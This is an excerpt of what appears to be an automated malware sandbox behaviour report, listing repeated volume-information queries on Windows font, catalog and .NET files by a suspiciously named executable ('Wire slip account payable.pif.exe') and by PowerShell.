                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
